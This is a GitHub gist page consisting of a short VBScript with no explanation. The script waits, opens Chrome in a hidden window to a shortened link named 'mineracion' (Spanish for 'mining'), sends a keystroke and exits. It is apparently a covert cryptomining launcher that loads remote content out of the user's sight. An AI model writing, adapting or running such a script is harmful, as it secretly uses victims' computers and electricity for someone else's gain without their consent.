Skip to content

Instantly share code, notes, and snippets.

@h4kun4matata
Created January 13, 2018 06:03
Show Gist options
  • Select an option

  • Save h4kun4matata/e9d2435d11a9b370ae3a12530781a0c6 to your computer and use it in GitHub Desktop.

Select an option

Save h4kun4matata/e9d2435d11a9b370ae3a12530781a0c6 to your computer and use it in GitHub Desktop.
Dim WShell
Set WShell = CreateObject("WScript.Shell")
Wscript.Sleep 1000
Set objShell = WScript.CreateObject("WScript.Shell")
Set wshshell = WScript.CreateObject("WScript.Shell")
Wscript.Sleep 10000
wshshell.run """chrome.exe""http://bit.ly/mineracion",0,False
Wscript.Sleep 5000
objShell.SendKeys " "
Set wshshell = Nothing
wscript.quit
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment